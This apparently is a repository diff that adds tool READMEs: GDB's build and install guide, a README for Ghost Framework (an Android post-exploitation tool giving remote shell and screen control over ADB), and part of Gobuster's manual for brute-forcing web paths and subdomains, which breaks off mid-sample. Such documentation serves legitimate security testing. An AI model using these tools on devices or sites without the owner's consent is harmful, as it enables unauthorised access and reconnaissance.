+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
README for GDB release
+
This is GDB, the GNU source-level debugger.
+
A summary of new features is in the file `gdb/NEWS'.
+
Check the GDB home page at http://www.gnu.org/software/gdb/ for up to
date release information, mailing list links and archives, etc.
+
GDB's bug tracking database can be found at
http://www.gnu.org/software/gdb/bugs/
+
Unpacking and Installation -- quick overview
==========================
+
The release is provided as a gzipped tar file called
'gdb-VERSION.tar.gz', where VERSION is the version of GDB.
+
The GDB debugger sources, the generic GNU include
files, the BFD ("binary file description") library, the readline
library, and other libraries all have directories of their own
underneath the gdb-VERSION directory. The idea is that a variety of GNU
tools can share a common copy of these things. Be aware of variation
over time--for example don't try to build GDB with a copy of bfd from
a release other than the GDB release (such as a binutils release),
especially if the releases are more than a few weeks apart.
Configuration scripts and makefiles exist to cruise up and down this
directory tree and automatically build all the pieces in the right
order.
+
When you unpack the gdb-VERSION.tar.gz file, it will create a
source directory called `gdb-VERSION'.
+
You can build GDB right in the source directory:
+
cd gdb-VERSION
./configure --prefix=/usr/local (or wherever you want)
make all install
+
However, we recommend that an empty directory be used instead.
This way you do not clutter your source tree with binary files
and will be able to create different builds with different
configuration options.
+
You can build GDB in any empty build directory:
+
mkdir build
cd build
<full path to your sources>/gdb-VERSION/configure [etc...]
make all install
+
(Building GDB with DJGPP tools for MS-DOS/MS-Windows is slightly
different; see the file gdb-VERSION/gdb/config/djgpp/README for details.)
+
This will configure and build all the libraries as well as GDB. If
`configure' can't determine your system type, specify one as its
argument, e.g., `./configure sun4' or `./configure decstation'.
+
Make sure that your 'configure' line ends in 'gdb-VERSION/configure':
+
/berman/migchain/source/gdb-VERSION/configure # RIGHT
/berman/migchain/source/gdb-VERSION/gdb/configure # WRONG
+
The GDB package contains several subdirectories, such as 'gdb',
'bfd', and 'readline'. If your 'configure' line ends in
'gdb-VERSION/gdb/configure', then you are configuring only the gdb
subdirectory, not the whole GDB package. This leads to build errors
such as:
+
make: *** No rule to make target `../bfd/bfd.h', needed by `gdb.o'. Stop.
+
If you get other compiler errors during this stage, see the `Reporting
Bugs' section below; there are a few known problems.
+
GDB's `configure' script has many options to enable or disable
different features or dependencies. These options are not generally
known to the top-level `configure', so if you want to see a complete
list of options, invoke the subdirectory `configure', like:
+
/berman/migchain/source/gdb-VERSION/gdb/configure --help
+
(Take note of how this differs from the invocation used to actually
configure the build tree.)
+
GDB requires a C++11 compiler. If you do not have a
C++11 compiler for your system, you may be able to download and install
the GNU CC compiler. It is available via anonymous FTP from the
directory `ftp://ftp.gnu.org/pub/gnu/gcc'. GDB also requires an ISO
C standard library. The GDB remote server, GDBserver, builds with some
non-ISO standard libraries - e.g. for Windows CE.
+
GDB can optionally be built against various external libraries.
These dependencies are described below in the "`configure options"
section of this README.
+
GDB can be used as a cross-debugger, running on a machine of one
type while debugging a program running on a machine of another type.
See below.
+
+
More Documentation
******************
+
All the documentation for GDB comes as part of the machine-readable
distribution. The documentation is written in Texinfo format, which
is a documentation system that uses a single source file to produce
both on-line information and a printed manual. You can use one of the
Info formatting commands to create the on-line version of the
documentation and TeX (or `texi2roff') to typeset the printed version.
+
GDB includes an already formatted copy of the on-line Info version
of this manual in the `gdb/doc' subdirectory. The main Info file is
`gdb-VERSION/gdb/doc/gdb.info', and it refers to subordinate files
matching `gdb.info*' in the same directory. If necessary, you can
print out these files, or read them with any editor; but they are
easier to read using the `info' subsystem in GNU Emacs or the
standalone `info' program, available as part of the GNU Texinfo
distribution.
+
If you want to format these Info files yourself, you need one of the
Info formatting programs, such as `texinfo-format-buffer' or
`makeinfo'.
+
If you have `makeinfo' installed, and are in the top level GDB
source directory (`gdb-VERSION'), you can make the Info file by
typing:
+
cd gdb/doc
make info
+
If you want to typeset and print copies of this manual, you need
TeX, a program to print its DVI output files, and `texinfo.tex', the
Texinfo definitions file. This file is included in the GDB
distribution, in the directory `gdb-VERSION/texinfo'.
+
TeX is a typesetting program; it does not print files directly, but
produces output files called DVI files. To print a typeset document,
you need a program to print DVI files. If your system has TeX
installed, chances are it has such a program. The precise command to
use depends on your system; `lpr -d' is common; another (for PostScript
devices) is `dvips'. The DVI print command may require a file name
without any extension or a `.dvi' extension.
+
TeX also requires a macro definitions file called `texinfo.tex'.
This file tells TeX how to typeset a document written in Texinfo
format. On its own, TeX cannot read, much less typeset a Texinfo file.
`texinfo.tex' is distributed with GDB and is located in the
`gdb-VERSION/texinfo' directory.
+
If you have TeX and a DVI printer program installed, you can typeset
and print this manual. First switch to the `gdb' subdirectory of
the main source directory (for example, to `gdb-VERSION/gdb') and then type:
+
make doc/gdb.dvi
+
If you prefer to have the manual in PDF format, type this from the
`gdb/doc' subdirectory of the main source directory:
+
make gdb.pdf
+
For this to work, you will need the PDFTeX package to be installed.
+
+
Installing GDB
**************
+
GDB comes with a `configure' script that automates the process of
preparing GDB for installation; you can then use `make' to build the
`gdb' program.
+
The GDB distribution includes all the source code you need for GDB in
a single directory. That directory contains:
+
`gdb-VERSION/{COPYING,COPYING.LIB}'
Standard GNU license files. Please read them.
+
`gdb-VERSION/bfd'
source for the Binary File Descriptor library
+
`gdb-VERSION/config*'
script for configuring GDB, along with other support files
+
`gdb-VERSION/gdb'
the source specific to GDB itself
+
`gdb-VERSION/include'
GNU include files
+
`gdb-VERSION/libiberty'
source for the `-liberty' free software library
+
`gdb-VERSION/opcodes'
source for the library of opcode tables and disassemblers
+
`gdb-VERSION/readline'
source for the GNU command-line interface
NOTE: The readline library is compiled for use by GDB, but will
not be installed on your system when "make install" is issued.
+
`gdb-VERSION/sim'
source for some simulators (ARM, D10V, SPARC, M32R, MIPS, PPC, V850, etc)
+
`gdb-VERSION/texinfo'
The `texinfo.tex' file, which you need in order to make a printed
manual using TeX.
+
`gdb-VERSION/etc'
Coding standards, useful files for editing GDB, and other
miscellanea.
+
Note: the following instructions are for building GDB on Unix or
Unix-like systems. Instructions for building with DJGPP for
MS-DOS/MS-Windows are in the file gdb/config/djgpp/README.
+
The simplest way to configure and build GDB is to run `configure'
from the `gdb-VERSION' directory.
+
First switch to the `gdb-VERSION' source directory if you are
not already in it; then run `configure'.
+
For example:
+
cd gdb-VERSION
./configure
make
+
Running `configure' followed by `make' builds the `bfd',
`readline', `mmalloc', and `libiberty' libraries, then `gdb' itself.
The configured source files, and the binaries, are left in the
corresponding source directories.
+
`configure' is a Bourne-shell (`/bin/sh') script; if your system
does not recognize this automatically when you run a different shell,
you may need to run `sh' on it explicitly:
+
sh configure
+
If you run `configure' from a directory that contains source
directories for multiple libraries or programs, `configure' creates
configuration files for every directory level underneath (unless
you tell it not to, with the `--norecursion' option).
+
You can install `gdb' anywhere; it has no hardwired paths. However,
you should make sure that the shell on your path (named by the `SHELL'
environment variable) is publicly readable. Remember that GDB uses the
shell to start your program--some systems refuse to let GDB debug child
processes whose programs are not readable.
+
+
Compiling GDB in another directory
==================================
+
If you want to run GDB versions for several host or target machines,
you need a different `gdb' compiled for each combination of host and
target. `configure' is designed to make this easy by allowing you to
generate each configuration in a separate subdirectory, rather than in
the source directory. If your `make' program handles the `VPATH'
feature correctly (GNU `make' and SunOS 'make' are two that should),
running `make' in each of these directories builds the `gdb' program
specified there.
+
To build `gdb' in a separate directory, run `configure' with the
`--srcdir' option to specify where to find the source. (You also need
to specify a path to find `configure' itself from your working
directory. If the path to `configure' would be the same as the
argument to `--srcdir', you can leave out the `--srcdir' option; it
will be assumed.)
+
For example, you can build GDB in a separate
directory for a Sun 4 like this:
+
cd gdb-VERSION
mkdir ../gdb-sun4
cd ../gdb-sun4
../gdb-VERSION/configure
make
+
When `configure' builds a configuration using a remote source
directory, it creates a tree for the binaries with the same structure
(and using the same names) as the tree under the source directory. In
the example, you'd find the Sun 4 library `libiberty.a' in the
directory `gdb-sun4/libiberty', and GDB itself in `gdb-sun4/gdb'.
+
One popular reason to build several GDB configurations in separate
directories is to configure GDB for cross-compiling (where GDB runs on
one machine--the host--while debugging programs that run on another
machine--the target). You specify a cross-debugging target by giving
the `--target=TARGET' option to `configure'.
+
When you run `make' to build a program or library, you must run it
in a configured directory--whatever directory you were in when you
called `configure' (or one of its subdirectories).
+
The `Makefile' that `configure' generates in each source directory
also runs recursively. If you type `make' in a source directory such
as `gdb-VERSION' (or in a separate configured directory configured with
`--srcdir=PATH/gdb-VERSION'), you will build all the required libraries,
and then build GDB.
+
When you have multiple hosts or targets configured in separate
directories, you can run `make' on them in parallel (for example, if
they are NFS-mounted on each of the hosts); they will not interfere
with each other.
+
+
Specifying names for hosts and targets
======================================
+
The specifications used for hosts and targets in the `configure'
script are based on a three-part naming scheme, but some short
predefined aliases are also supported. The full naming scheme encodes
three pieces of information in the following pattern:
+
ARCHITECTURE-VENDOR-OS
+
For example, you can use the alias `sun4' as a HOST argument or in a
`--target=TARGET' option. The equivalent full name is
`sparc-sun-sunos4'.
+
The `configure' script accompanying GDB does not provide any query
facility to list all supported host and target names or aliases.
`configure' calls the Bourne shell script `config.sub' to map
abbreviations to full names; you can read the script, if you wish, or
you can use it to test your guesses on abbreviations--for example:
+
% sh config.sub sun4
sparc-sun-sunos4.1.1
% sh config.sub sun3
m68k-sun-sunos4.1.1
% sh config.sub decstation
mips-dec-ultrix4.2
% sh config.sub hp300bsd
m68k-hp-bsd
% sh config.sub i386v
i386-pc-sysv
% sh config.sub i786v
Invalid configuration `i786v': machine `i786v' not recognized
+
`config.sub' is also distributed in the GDB source directory.
+
+
`configure' options
===================
+
Here is a summary of the `configure' options and arguments that are
most often useful for building GDB. `configure' also has several other
options not listed here. There are many options to gdb's `configure'
script, some of which are only useful in special situations.
*note : (autoconf.info)Running configure scripts, for a full
explanation of `configure'.
+
configure [--help]
[--prefix=DIR]
[--srcdir=PATH]
[--target=TARGET]
[--host=HOST]
[HOST]
+
You may introduce options with a single `-' rather than `--' if you
prefer; but you may abbreviate option names if you use `--'. Some
more obscure GDB `configure' options are not listed here.
+
`--help'
Display a quick summary of how to invoke `configure'.
+
`--prefix=DIR'
Configure the source to install programs and files under directory
`DIR'.
+
`--srcdir=PATH'
*Warning: using this option requires GNU `make', or another `make'
that compatibly implements the `VPATH' feature.*
Use this option to make configurations in directories separate
from the GDB source directories. Among other things, you can use
this to build (or maintain) several configurations simultaneously,
in separate directories. `configure' writes configuration
specific files in the current directory, but arranges for them to
use the source in the directory PATH. `configure' will create
directories under the working directory in parallel to the source
directories below PATH.
+
`--host=HOST'
Configure GDB to run on the specified HOST.
+
There is no convenient way to generate a list of all available
hosts.
+
`HOST ...'
Same as `--host=HOST'. If you omit this, GDB will guess; it's
quite accurate.
+
`--target=TARGET'
Configure GDB for cross-debugging programs running on the specified
TARGET. Without this option, GDB is configured to debug programs
that run on the same machine (HOST) as GDB itself.
+
There is no convenient way to generate a list of all available
targets.
+
`--enable-targets=TARGET,TARGET,...'
`--enable-targets=all'
Configure GDB for cross-debugging programs running on the
specified list of targets. The special value `all' configures
GDB for debugging programs running on any target it supports.
+
`--with-gdb-datadir=PATH'
Set the GDB-specific data directory. GDB will look here for
certain supporting files or scripts. This defaults to the `gdb'
subdirectory of `datadir' (which can be set using `--datadir').
+
`--with-relocated-sources=DIR'
Sets up the default source path substitution rule so that
directory names recorded in debug information will be
automatically adjusted for any directory under DIR. DIR should
be a subdirectory of GDB's configured prefix, the one mentioned
in the `--prefix' or `--exec-prefix' options to configure. This
option is useful if GDB is supposed to be moved to a different
place after it is built.
+
`--enable-64-bit-bfd'
Enable 64-bit support in BFD on 32-bit hosts.
+
`--disable-gdbmi'
Build GDB without the GDB/MI machine interface.
+
`--enable-tui'
Build GDB with the text-mode full-screen user interface (TUI).
Requires a curses library (ncurses and cursesX are also
supported).
+
`--with-curses'
Use the curses library instead of the termcap library, for
text-mode terminal operations.
+
`--with-debuginfod'
Build GDB with libdebuginfod, the debuginfod client library. Used
to automatically fetch source files and separate debug files from
debuginfod servers using the associated executable's build ID.
Enabled by default if libdebuginfod is installed and found at
configure time. debuginfod is packaged with elfutils, starting
with version 0.178. You can get the latest version from
'https://sourceware.org/elfutils/'.
+
`--with-libunwind-ia64'
Use the libunwind library for unwinding function call stack on ia64
target platforms.
See http://www.nongnu.org/libunwind/index.html for details.
+
`--with-system-readline'
Use the readline library installed on the host, rather than the
library supplied as part of GDB. Readline 7 or newer is required;
this is enforced by the build system.
+
`--with-system-zlib'
Use the zlib library installed on the host, rather than the
library supplied as part of GDB.
+
`--with-expat'
Build GDB with Expat, a library for XML parsing. (Done by
default if libexpat is installed and found at configure time.)
This library is used to read XML files supplied with GDB. If it
is unavailable, some features, such as remote protocol memory
maps, target descriptions, and shared library lists, that are
based on XML files, will not be available in GDB. If your host
does not have libexpat installed, you can get the latest version
from `http://expat.sourceforge.net'.
+
`--with-libiconv-prefix[=DIR]'
Build GDB with GNU libiconv, a character set encoding conversion
library. This is not done by default, as on GNU systems the
`iconv' that is built in to the C library is sufficient. If your
host does not have a working `iconv', you can get the latest
version of GNU iconv from `https://www.gnu.org/software/libiconv/'.
+
GDB's build system also supports building GNU libiconv as part of
the overall build. See the GDB manual instructions on how to do
this.
+
`--with-lzma'
Build GDB with LZMA, a compression library. (Done by default if
liblzma is installed and found at configure time.) LZMA is used
by GDB's "mini debuginfo" feature, which is only useful on
platforms using the ELF object file format. If your host does
not have liblzma installed, you can get the latest version from
`https://tukaani.org/xz/'.
+
`--with-libgmp-prefix=DIR'
Build GDB using the GMP library installed at the directory DIR.
If your host does not have GMP installed, you can get the latest
version at `https://gmplib.org/'.
+
`--with-mpfr'
Build GDB with GNU MPFR, a library for multiple-precision
floating-point computation with correct rounding. (Done by
default if GNU MPFR is installed and found at configure time.)
This library is used to emulate target floating-point arithmetic
during expression evaluation when the target uses different
floating-point formats than the host. If GNU MPFR is not
available, GDB will fall back to using host floating-point
arithmetic. If your host does not have GNU MPFR installed, you
can get the latest version from `https://www.mpfr.org/'.
+
`--with-python[=PYTHON]'
Build GDB with Python scripting support. (Done by default if
libpython is present and found at configure time.) Python makes
GDB scripting much more powerful than the restricted CLI
scripting language. If your host does not have Python installed,
you can find it on `http://www.python.org/download/'. The oldest
version of Python supported by GDB is 2.6. The optional argument
PYTHON is used to find the Python headers and libraries. It can
be either the name of a Python executable, or the name of the
directory in which Python is installed.
+
`--with-guile[=GUILE]'
Build GDB with GNU Guile scripting support. (Done by default if
libguile is present and found at configure time.) If your host
does not have Guile installed, you can find it at
`https://www.gnu.org/software/guile/'. The optional argument
GUILE can be a version number, which will cause `configure' to
try to use that version of Guile; or the file name of a
`pkg-config' executable, which will be queried to find the
information needed to compile and link against Guile.
+
`--enable-source-highlight'
When printing source code, use source highlighting. This requires
libsource-highlight to be installed and is enabled by default
if the library is found.
+
`--with-xxhash'
Use libxxhash for hashing. This has no user-visible effect but
speeds up various GDB operations such as symbol loading. Enabled
by default if libxxhash is found.
+
`--without-included-regex'
Don't use the regex library included with GDB (as part of the
libiberty library). This is the default on hosts with version 2
of the GNU C library.
+
`--with-sysroot=DIR'
Use DIR as the default system root directory for libraries whose
file names begin with `/lib' or `/usr/lib'. (The value of DIR
can be modified at run time by using the "set sysroot" command.)
If DIR is under the GDB configured prefix (set with `--prefix' or
`--exec-prefix' options), the default system root will be
automatically adjusted if and when GDB is moved to a different
location.
+
`--with-system-gdbinit=FILE'
Configure GDB to automatically load a system-wide init file.
FILE should be an absolute file name. If FILE is in a directory
under the configured prefix, and GDB is moved to another location
after being built, the location of the system-wide init file will
be adjusted accordingly.
+
`--with-system-gdbinit-dir=DIR'
Configure GDB to automatically load system-wide init files from
a directory. Files with extensions `.gdb', `.py' (if Python
support is enabled) and `.scm' (if Guile support is enabled) are
supported. DIR should be an absolute directory name. If DIR is
in a directory under the configured prefix, and GDB is moved to
another location after being built, the location of the system-
wide init directory will be adjusted accordingly.
+
`--enable-build-warnings'
When building the GDB sources, ask the compiler to warn about any
code which looks even vaguely suspicious. It passes many
different warning flags, depending on the exact version of the
compiler you are using.
+
`--enable-werror'
Treat compiler warnings as errors. It adds the -Werror flag to
the compiler, which will fail the compilation if the compiler
outputs any warning messages.
+
`--enable-ubsan'
Enable the GCC undefined behavior sanitizer. By default this is
disabled in GDB releases, but enabled when building from git.
The undefined behavior sanitizer checks for C++ undefined
behavior. It has a performance cost, so if you are looking at
GDB's performance, you should disable it.
+
`--enable-unit-tests[=yes|no]'
Enable (i.e., include) support for unit tests when compiling GDB
and GDBServer. Note that if this option is not passed, GDB will
have selftests if it is a development build, and will *not* have
selftests if it is a non-development build.
+
`configure' accepts other options, for compatibility with configuring
other GNU tools recursively.
+
+
Remote debugging
=================
+
The files m68k-stub.c, i386-stub.c, and sparc-stub.c are examples
of remote stubs to be used with remote.c. They are designed to run
standalone on an m68k, i386, or SPARC cpu and communicate properly
with the remote.c stub over a serial line.
+
The directory gdbserver/ contains `gdbserver', a program that
allows remote debugging for Unix applications. GDBserver is only
supported for some native configurations.
+
The file gdbserver/README includes further notes on GDBserver; in
particular, it explains how to build GDBserver for cross-debugging
(where GDBserver runs on the target machine, which is of a different
architecture than the host machine running GDB).
+
+
Reporting Bugs in GDB
=====================
+
There are several ways of reporting bugs in GDB. The preferred
method is to use the World Wide Web:
+
http://www.gnu.org/software/gdb/bugs/
+
As an alternative, the bug report can be submitted, via e-mail, to the
address "bug-gdb@gnu.org".
+
When submitting a bug, please include the GDB version number, and
how you configured it (e.g., "sun4" or "mach386 host,
i586-intel-synopsys target"). Since GDB supports so many
different configurations, it is important that you be precise about
this. The simplest way to do this is to include the output from these
commands:
+
% gdb --version
% gdb --config
+
For more information on how/whether to report bugs, see the
Reporting Bugs chapter of the GDB manual (gdb/doc/gdb.texinfo).
+
+
Graphical interface to GDB -- X Windows, MS Windows
==========================
+
Several graphical interfaces to GDB are available. You should
check:
+
https://sourceware.org/gdb/wiki/GDB%20Front%20Ends
+
for an up-to-date list.
+
Emacs users will very likely enjoy the Grand Unified Debugger mode;
try typing `M-x gdb RET'.
+
+
Writing Code for GDB
=====================
+
There is information about writing code for GDB in the file
`CONTRIBUTE' and at the website:
+
http://www.gnu.org/software/gdb/
+
in particular in the wiki.
+
If you are pondering writing anything but a short patch, especially
take note of the information about copyrights and copyright assignment.
It can take quite a while to get all the paperwork done, so
we encourage you to start that process as soon as you decide you are
planning to work on something, or at least well ahead of when you
think you will be ready to submit the patches.
+
+
GDB Testsuite
=============
+
Included with the GDB distribution is a DejaGNU based testsuite
that can either be used to test your newly built GDB, or for
regression testing a GDB with local modifications.
+
Running the testsuite requires the prior installation of DejaGNU,
which is generally available via ftp. The directory
ftp://sources.redhat.com/pub/dejagnu/ will contain a recent snapshot.
Once DejaGNU is installed, you can run the tests in one of the
following ways:
+
(1) cd gdb-VERSION
make check-gdb
+
or
+
(2) cd gdb-VERSION/gdb
make check
+
or
+
(3) cd gdb-VERSION/gdb/testsuite
make site.exp (builds the site specific file)
runtest -tool gdb GDB=../gdb (or GDB=<somepath> as appropriate)
+
When using a `make'-based method, you can use the Makefile variable
`RUNTESTFLAGS' to pass flags to `runtest', e.g.:
+
make RUNTESTFLAGS=--directory=gdb.cp check
+
If you use GNU make, you can use its `-j' option to run the testsuite
in parallel. This can greatly reduce the amount of time it takes for
the testsuite to run. In this case, if you set `RUNTESTFLAGS' then,
by default, the tests will be run serially even under `-j'. You can
override this and force a parallel run by setting the `make' variable
`FORCE_PARALLEL' to any non-empty value. Note that the parallel `make
check' assumes that you want to run the entire testsuite, so it is not
compatible with some dejagnu options, like `--directory'.
+
The last method gives you slightly more control in case of problems
with building one or more test executables or if you are using the
testsuite `standalone', without it being part of the GDB source tree.
+
See the DejaGNU documentation for further details.
+
+
Copyright and License Notices
=============================
+
Most files maintained by the GDB Project contain a copyright notice
as well as a license notice, usually at the start of the file.
+
To reduce the length of copyright notices, consecutive years in the
copyright notice can be combined into a single range. For instance,
the following list of copyright years...
+
1986, 1988, 1989, 1991-1993, 1999, 2000, 2007, 2008, 2009, 2010, 2011
+
... is abbreviated into:
+
1986, 1988-1989, 1991-1993, 1999-2000, 2007-2011
+
Every year of each range, inclusive, is a copyrightable year that
could be listed individually.
+
(this is for editing this file with GNU emacs)
Local Variables:
mode: text
End:
+
+ + + +
+ +
+ + + + +
+ + +
+ + +
+
+ + +
+ + + +
+
+ +
+
+ +
+ + + + + + + + + + + + + + + + + + + + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/geoip.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/geoip.md new file mode 100755 index 00000000..16e29adb --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/geoip.md @@ -0,0 +1 @@ +Latitude and longitude are not precise and should not be used to identify a particular street address or household. diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/ghost.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/ghost.md new file mode 100755 index 00000000..b724d648 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/ghost.md @@ -0,0 +1,121 @@ +# Ghost Framework + +

logo

+ +

+ + + + + + + + + + + + + + + + + + +

+ +

ghost_1

+ +*** + +# About Ghost Framework + +``` +Ghost Framework is an Android post-exploitation framework that exploits the +Android Debug Bridge to remotely access an Android device. Ghost Framework +gives you the power and convenience of remote Android device administration. +``` + +*** + +# Getting started + +
+Ghost installation + +``` +To install Ghost Framework you should +execute the following commands. +``` + +> cd ghost + +> chmod +x install.sh + +> ./install.sh + +
+ +
+Ghost uninstallation + +``` +To uninstall Ghost Framework you should +execute the following commands. +``` + +> cd ghost + +> chmod +x uninstall.sh + +> ./uninstall.sh + +
+ +*** + +# Ghost Framework execution + +``` +To run Ghost Framework you should +execute the following command. +``` + +> ghost + +*** + +# Why Ghost Framework + +* Simple and clear UX/UI. + +``` +Ghost Framework has a simple and clear UX/UI. +It is easy to understand and it will be easier +for you to master the Ghost Framework. +``` + +* Device shell access. + +``` +Ghost Framework has the ability to access the remote Android +device shell without using OpenSSH or other protocols. +``` + +* Controlling device screen + +``` +Ghost Framework has the ability to access device screen +and control it remotely using mouse and keyboard. +``` + +

ghost_2

+ +*** + +# Ghost Framework disclaimer + +``` +Usage of the Ghost Framework for attacking targets without prior mutual consent is illegal. +It is the end user's responsibility to obey all applicable local, state, federal, and international laws. +Developers assume no liability and are not responsible for any misuse or damage caused by this program. +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gobuster.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gobuster.md new file mode 100755 index 00000000..9b5e4cfa --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gobuster.md @@ -0,0 +1,822 @@ +# Gobuster + +Gobuster is a tool used to brute-force: + +- URIs (directories and files) in web sites. +- DNS subdomains (with wildcard support). +- Virtual Host names on target web servers. +- Open Amazon S3 buckets + +## Tags, Statuses, etc + +[![Build Status](https://travis-ci.com/OJ/gobuster.svg?branch=master)](https://travis-ci.com/OJ/gobuster) [![Backers on Open Collective](https://opencollective.com/gobuster/backers/badge.svg)](https://opencollective.com/gobuster) [![Sponsors on Open Collective](https://opencollective.com/gobuster/sponsors/badge.svg)](https://opencollective.com/gobuster) + + +## Love this tool? Back it! + +If you're backing us already, you rock. If you're not, that's cool too! Want to back us? [Become a backer](https://opencollective.com/gobuster#backer)! + +[![Backers](https://opencollective.com/gobuster/backers.svg?width=890)](https://opencollective.com/gobuster#backers) + +All funds that are donated to this project will be donated to charity. A full log of charity donations will be available in this repository as they are processed. 
+ +# Changes + +## 3.4 + +- Enable TLS1.0 and TLS1.1 support +- Add TFTP mode to search for files on tftp servers + +## 3.3 + +- Support TLS client certificates / mtls +- support loading extensions from file +- support fuzzing POST body, HTTP headers and basic auth +- new option to not canonicalize header names + +## 3.2 + +- Use go 1.19 +- use contexts in the correct way +- get rid of the wildcard flag (except in DNS mode) +- color output +- retry on timeout +- google cloud bucket enumeration +- fix nil reference errors + +## 3.1 + +- enumerate public AWS S3 buckets +- fuzzing mode +- specify HTTP method +- added support for patterns. You can now specify a file containing patterns that are applied to every word, one by line. Every occurrence of the term `{GOBUSTER}` in it will be replaced with the current wordlist item. Please use with caution as this can cause increase the number of requests issued a lot. +- The shorthand `p` flag which was assigned to proxy is now used by the pattern flag + +## 3.0 + +- New CLI options so modes are strictly separated (`-m` is now gone!) +- Performance Optimizations and better connection handling +- Ability to enumerate vhost names +- Option to supply custom HTTP headers + +# License + +See the LICENSE file. + +# Manual + +## Available Modes + +- dir - the classic directory brute-forcing mode +- dns - DNS subdomain brute-forcing mode +- s3 - Enumerate open S3 buckets and look for existence and bucket listings +- gcs - Enumerate open google cloud buckets +- vhost - virtual host brute-forcing mode (not the same as DNS!) +- fuzz - some basic fuzzing, replaces the `FUZZ` keyword + +## Easy Installation + +### Binary Releases + +We are now shipping binaries for each of the releases so that you don't even have to build them yourself! How wonderful is that! + +If you're stupid enough to trust binaries that I've put together, you can download them from the [releases](https://github.com/OJ/gobuster/releases) page. 
+ +### Using `go install` + +If you have a [Go](https://golang.org/) environment ready to go (at least go 1.19), it's as easy as: + +```bash +go install github.com/OJ/gobuster/v3@latest +``` + +PS: You need at least go 1.19 to compile gobuster. + +### Building From Source + +Since this tool is written in [Go](https://golang.org/) you need to install the Go language/compiler/etc. Full details of installation and set up can be found [on the Go language website](https://golang.org/doc/install). Once installed you have two options. You need at least go 1.19 to compile gobuster. + +### Compiling + +`gobuster` has external dependencies, and so they need to be pulled in first: + +```bash +go get && go build +``` + +This will create a `gobuster` binary for you. If you want to install it in the `$GOPATH/bin` folder you can run: + +```bash +go install +``` + +## Modes + +Help is built-in! + +- `gobuster help` - outputs the top-level help. +- `gobuster help ` - outputs the help specific to that mode. + +## `dns` Mode + +### Options + +```text +Uses DNS subdomain enumeration mode + +Usage: + gobuster dns [flags] + +Flags: + -d, --domain string The target domain + -h, --help help for dns + -r, --resolver string Use custom DNS server (format server.com or server.com:port) + -c, --show-cname Show CNAME records (cannot be used with '-i' option) + -i, --show-ips Show IP addresses + --timeout duration DNS resolver timeout (default 1s) + --wildcard Force continued operation when wildcard found + +Global Flags: + --delay duration Time each thread waits between requests (e.g. 
1500ms) + --no-color Disable color output + --no-error Don't display errors + -z, --no-progress Don't display progress + -o, --output string Output file to write results to (defaults to stdout) + -p, --pattern string File containing replacement patterns + -q, --quiet Don't print the banner and other noise + -t, --threads int Number of concurrent threads (default 10) + -v, --verbose Verbose output (errors) + -w, --wordlist string Path to the wordlist +``` + +### Examples + + +```text +gobuster dns -d mysite.com -t 50 -w common-names.txt +``` + +Normal sample run goes like this: + +```text +gobuster dns -d google.com -w ~/wordlists/subdomains.txt + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dns +[+] Url/Domain : google.com +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/subdomains.txt +=============================================================== +2019/06/21 11:54:20 Starting gobuster +=============================================================== +Found: chrome.google.com +Found: ns1.google.com +Found: admin.google.com +Found: www.google.com +Found: m.google.com +Found: support.google.com +Found: translate.google.com +Found: cse.google.com +Found: news.google.com +Found: music.google.com +Found: mail.google.com +Found: store.google.com +Found: mobile.google.com +Found: search.google.com +Found: wap.google.com +Found: directory.google.com +Found: local.google.com +Found: blog.google.com +=============================================================== +2019/06/21 11:54:20 Finished +=============================================================== +``` + +Show IP sample run goes like this: + +```text +gobuster dns -d google.com -w ~/wordlists/subdomains.txt -i + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian 
